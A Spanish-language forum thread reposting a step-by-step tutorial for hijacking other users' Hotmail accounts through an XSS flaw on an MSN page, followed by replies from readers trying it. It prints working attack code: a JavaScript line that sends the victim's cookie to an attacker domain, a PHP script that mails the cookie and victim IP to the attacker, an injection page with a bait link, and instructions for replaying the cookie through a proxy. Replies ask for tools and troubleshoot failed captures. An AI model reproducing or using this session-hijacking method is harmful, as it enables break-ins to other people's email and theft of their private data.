ACTUALIZACIÓN: parece ser que Microsoft ha corregido finalmente la vulnerabilidad. Sin embargo esto no invalida totalmente el tutorial, ya que a la que vuelva a aparecer otra página vulnerable a ataques XSS - y posiblemente aparecerá - simplemente tendremos que modificar el paso 4.

Como prometí hace unos días, voy a colgar un paso a paso de cómo obtener acceso a cuentas de Hotmail de otros usuarios a través del robo de la cookie, posible gracias a hecho de que existe una vulnerabilidad sobre la cual leí hace ya tres semanas en Full Disclosure de insecure.org Full Disclosure rss feed y a día de hoy, 6 de septiembre, sigue sin estar solucionada.

Este paso a paso está basado tanto en esa información como en un tutorial acerca de una vulnerabilidad similar detectada el año pasado,

Eso sí, tened en cuento que si bien lo que voy explicar no constituye un delito, el entrar en la cuenta de correo de otra persona sí que lo es – o al menos creo. Tened también en cuenta que esto tampoco sirve para recuperar la contraseña de una cuenta de Hotmail. Lo único que hacemos es apropiarnos de la cookie de un usuario que ya está identificado en Hotmail y hacernos pasar por él. Por último, recordad que la cookie sólo será válida durante unas cuantas horas – 8 como máximo según mi experiencia -, y que para poder realizar todo el proceso necesitaremos algún dominio que pueda ejecutar scripts de servidor (PHP en el caso de este tutorial).

Una vez aclarados esos puntos, pasamos al tutorial:

   1. Creamos una cuenta en Hotmail sobre la que hacer las pruebas.
   2. Creamos el fichero javascript cookie.js, sustituyendo www.tudominio.com por la ruta donde alojes los scripts.

      location.href='http://www.tudominio.com/cookie.php?cookie='+escape(document.cookie)

      Este script lo único que hace es llamar a una página PHP que se encargará de guardar la cookie.
   3. Creamos el fichero cookie.php, sustituyendo nombre@correo.com por el tu propio correo al que enviarás la cookie, y http://www.otrodominio.com por la URL de un dominio cualquiera, que será a donde será redirigido al usuario una vez haya finalizado el proceso.

      <?
      $cookie = $_GET['cookie'];
      $ip = getenv("REMOTE_ADDR");
      $msg = "Cookie: $cookie\nIP Address: $ip";
      $subject = "cookie";
      mail("nombre@correo.com", $subject, $msg);
      header ("location: http://www.otrodominio.com");
      ?>

   4. Creamos un fichero pagina.html, que será la página que deberá cargar el usuario para iniciar el proceso. Evidentemente, podemos cambiar el nombre del fichero, para hacerlo más apetecible para el que tiene que hacer clic.

      <meta http-equiv="refresh" content="0; url=http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src=http://www.tudominio.com/cookie.js>">

      En el código hay que sustituir www.tudominio.com por el nombre de dominio donde hayas alojado los otros dos fichero cookie.php y cookie.js. La página únicamente se encarga de redirigir al usuario a la página de Microsoft vulnerable al ataque http://newsletters.msn.com/xs-v3/insite.asp, que a su vez y debido a la inyección del script en la URL redirige el usuario a nuestra página cookie.js, que llama a cookie.php que recoge la cookie y la envía a nuestro correo.
   5. Ahora sólo tienes que enviarte un correo electrónico a la cuenta de Hotmail que hemos creado en el paso 1, con un enlace a la página http://www.tudominio.com/pagina.html, y hacer clic una vez llegue el correo. En breves instantes recibiréis un correo en la dirección que hemos puesto en el fichero cookie.php, con la cookie de usuario y la IP.

   6. Una vez hemos conseguido la cookie es el momento de usarla para hacernos pasar por ese usuario. Para ella nada mejor que un programa como Proxomitron.
   7. Bajamos el programa, lo ejecutamos, y en la primera ventana dejamos marcado solamente Outgoin Header Filters y pulsamos el botón Headers

   8. En la siguiente ventana desmarcamos todas las opciones a excepción de la casilla out de Cookie: Fake a cookie (out), seleccionamos la opción y pulsamos Edit.

   9. Ahora sólo tenemos que introducir la cookie recibida en la casilla Replacement text, pulsar Ok, pulsar Apply. A partir de este momento, tenemos configurado el programa para que ante cualquier petición de página, envíe esa cookie.

  10. Ahora tenemos que configurar el navegador para que utilice a Proxomitron como proxy. Para el tutorial he utilizado IE, evitando así tocar configuraciones de mi navegador habitual, Opera. Vamos a Herramientas – Opciones de Internet – Conexiones – Configuración de Lan… - marcar utilizar un servidor Proxy y poner en Dirección 127.0.0.1 y en Puerto 8080. A partir de ahora todas las páginas que carguemos desde el IE pasarán por Proxomitron, que únicamente enviará la cookie que hemos configurado.

  11. Cargamos la página http://my.msn.com y si estamos en la página personal de la cuenta creada en el paso 1, solo tenemos que pulsar en el enlace a Hotmail y entrar en el correo. Si no, basta con recargar la página para asegurarnos de que la cookie se ha escrito.
---------
FUENTE SACADA DE :
http://blog.kibara.com/
saludos

ya encontré la página del creador de este ataque y su versión aún funciona, lo que me falta es el programa "the proxomiltron" no lo encuentro en ningún lugar, alguien me lo podría ofrecer? Graccias!

Bueno moviendo el tema, sigue como oday, ya esta parchado, alguna novedad, alguien lo exploto, por que lo maximo que  llego es el pantallado del msn, que sale mi nombre pages, con la tecnica escrita arriiba, me gustaria empezar una discucion sobre este tema

seria probar el bug----




 

Acabo de hacer todo =P

pero el mail me llega

cookie=
ip= x.x.x.x

Osea en la cookie no capturo nada =S

como seria para q capture la cookie^^?

y si se manda un fichero html el cual capute la cookie

y al abrir la pagina dentro de su correo lo haga?

yo lo intente y me sale esto


SafeRedirect=%26hm___ts%3d1174869049%26hm___ha%3dd67a34fa15429bcc521fa8673cdc99b1
SafeRedirect=%26hm___ts%3d1174869049%26hm___ha%3dd67a34fa15429bcc521fa8673cdc99b1


¿¿?? alguien explica porfavor?